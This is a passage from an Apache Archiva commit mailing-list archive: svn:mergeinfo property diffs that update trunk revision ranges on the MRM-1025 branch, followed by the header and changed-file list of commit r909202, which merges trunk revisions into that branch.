-/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage:825850-882383,882384-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage:825850-882383,882384-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage/maven2/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage/maven2:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage/maven2:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage/maven2:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage/maven2:825850-882383,882384-899477* +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage/maven2:825850-882383,882384-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolverTest.xml ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolverTest.xml:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolverTest.xml:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolverTest.xml:699795-705848 -/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolverTest.xml:825850-899477 +/archiva/trunk/archiva-modules/plugins/maven2-repository/src/test/resources/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolverTest.xml:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports:699795-705848 -/archiva/trunk/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports:825850-889227,889228-899477* +/archiva/trunk/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports:825850-889227,889228-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemEventListener.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemEventListener.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemEventListener.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemEventListener.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemEventListener.java:825850-899477 +/archiva/trunk/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemEventListener.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemFacet.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemFacet.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemFacet.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemFacet.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemFacet.java:825850-899477 +/archiva/trunk/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemFacet.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemFacetFactory.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemFacetFactory.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemFacetFactory.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemFacetFactory.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemFacetFactory.java:825850-899477 +/archiva/trunk/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/RepositoryProblemFacetFactory.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/consumers/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/consumers:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/consumers:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/consumers:699795-705848 -/archiva/trunk/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/consumers:825850-889227,889228-899477* +/archiva/trunk/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/consumers:825850-889227,889228-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/consumers/DuplicateArtifactsConsumer.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/consumers/DuplicateArtifactsConsumer.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/consumers/DuplicateArtifactsConsumer.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/consumers/DuplicateArtifactsConsumer.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/consumers/DuplicateArtifactsConsumer.java:825850-899477 +/archiva/trunk/archiva-modules/plugins/problem-reports/src/main/java/org/apache/archiva/reports/consumers/DuplicateArtifactsConsumer.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics:825850-887039,887040-899477* +/archiva/trunk/archiva-modules/plugins/repository-statistics:825850-887039,887040-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/pom.xml ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/pom.xml:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/pom.xml:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/pom.xml:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/pom.xml:825850-899477 +/archiva/trunk/archiva-modules/plugins/repository-statistics/pom.xml:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src:825850-887039,887040-899477* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src:825850-887039,887040-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/main:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/main:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/main:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main:825850-887039,887040-899477* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main:825850-887039,887040-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/main/java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/main/java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/main/java:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java:825850-887039,887040-899477* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java:825850-887039,887040-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/main/java/org:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/main/java/org:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/main/java/org:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org:825850-887039,887040-899477* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org:825850-887039,887040-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/main/java/org/apache:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/main/java/org/apache:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/main/java/org/apache:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache:825850-887039,887040-899477* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache:825850-887039,887040-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva:825850-887039,887040-899477* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva:825850-887039,887040-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata:825850-887039,887040-899477* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata:825850-887039,887040-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/model/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/model:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/model:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/model:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/model:825850-887039,887040-899477* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/model:825850-887039,887040-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/model/stats/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/model/stats:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/model/stats:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/model/stats:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/model/stats:825850-887039,887040-899477* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/model/stats:825850-887039,887040-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository:825850-887039,887040-899477* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository:825850-887039,887040-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/ ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats:825850-887039,887040-899477* +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats:825850-887039,887040-909070* Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/DefaultRepositoryStatisticsManager.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/DefaultRepositoryStatisticsManager.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/DefaultRepositoryStatisticsManager.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/DefaultRepositoryStatisticsManager.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/DefaultRepositoryStatisticsManager.java:825850-899477 +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/DefaultRepositoryStatisticsManager.java:825850-909070 Propchange: archiva/branches/MRM-1025/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatistics.java ------------------------------------------------------------------------------ --- svn:mergeinfo (original) +++ svn:mergeinfo Fri Feb 12 01:43:19 2010 @@ -2,4 +2,4 @@ /archiva/branches/MRM-541/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatistics.java:686983-687034 /archiva/branches/archiva-search-improvements/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatistics.java:723609-726925 /archiva/branches/archiva-struts2/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatistics.java:699795-705848 -/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatistics.java:825850-899477 +/archiva/trunk/archiva-modules/plugins/repository-statistics/src/main/java/org/apache/archiva/metadata/repository/stats/RepositoryStatistics.java:825850-909070 From [email protected] Fri Feb 12 01:43:57 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41744 invoked from network); 12 Feb 2010 01:43:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Feb 2010 01:43:57 -0000 Received: (qmail 43369 invoked by uid 500); 12 Feb 2010 01:43:57 -0000 Delivered-To: [email protected] Received: (qmail 43311 invoked by uid 500); 12 Feb 2010 01:43:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 43302 invoked by uid 99); 12 Feb 2010 01:43:57 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 01:43:57 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 01:43:50 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id B70B423889CB; Fri, 12 Feb 2010 01:43:27 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r909202 [1/4] - in /archiva/branches/MRM-1025: ./ archiva-docs/src/site/apt/adminguide/ archiva-docs/src/site/resources/images/tour/ archiva-docs/src/site/xdoc/tour/ archiva-modules/archiva-base/archiva-consumers/archiva-consumer-api/src/ma... Date: Fri, 12 Feb 2010 01:43:25 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: brett Date: Fri Feb 12 01:43:19 2010 New Revision: 909202 URL: http://svn.apache.org/viewvc?rev=909202&view=rev Log: Merged /archiva/trunk:r899478-909070 Added: archiva/branches/MRM-1025/archiva-docs/src/site/resources/images/tour/audit-log.png - copied unchanged from r909070, archiva/trunk/archiva-docs/src/site/resources/images/tour/audit-log.png archiva/branches/MRM-1025/archiva-docs/src/site/xdoc/tour/audit-log.xml - copied unchanged from r909070, archiva/trunk/archiva-docs/src/site/xdoc/tour/audit-log.xml Modified: archiva/branches/MRM-1025/ (props changed) archiva/branches/MRM-1025/archiva-docs/src/site/apt/adminguide/upgrade.apt archiva/branches/MRM-1025/archiva-docs/src/site/xdoc/tour/index.xml archiva/branches/MRM-1025/archiva-docs/src/site/xdoc/tour/maintenance.xml archiva/branches/MRM-1025/archiva-docs/src/site/xdoc/tour/reports.xml archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-consumers/archiva-consumer-api/src/main/java/org/apache/maven/archiva/consumers/Consumer.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata/repository/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-base/archiva-proxy/src/test/java/org/apache/archiva/metadata/repository/TestMetadataRepository.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-api/src/main/java/org/apache/archiva/scheduler/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-api/src/main/java/org/apache/archiva/scheduler/ArchivaTaskScheduler.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/java/org/apache/archiva/scheduler/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/java/org/apache/archiva/scheduler/database/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources/META-INF/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/main/resources/META-INF/plexus/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/java/org/apache/archiva/scheduler/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/java/org/apache/archiva/scheduler/database/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva/scheduler/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-database/src/test/resources/org/apache/archiva/scheduler/database/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/ArchivaIndexingTaskExecutor.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/ArtifactIndexingTask.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/java/org/apache/archiva/scheduler/indexing/IndexingArchivaTaskScheduler.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF/plexus/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/main/resources/META-INF/plexus/components.xml (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler/indexing/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-indexing/src/test/java/org/apache/archiva/scheduler/indexing/ArchivaIndexingTaskExecutorTest.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutor.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryArchivaTaskScheduler.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryTask.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/main/java/org/apache/archiva/scheduler/repository/RepositoryTaskJob.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/ArchivaRepositoryScanningTaskExecutorTest.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/TestConsumer.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/java/org/apache/archiva/scheduler/repository/TestRepositoryStatisticsManager.java (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/archiva-test.xml (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-scheduler/archiva-scheduler-repository/src/test/resources/org/apache/archiva/ (props changed) 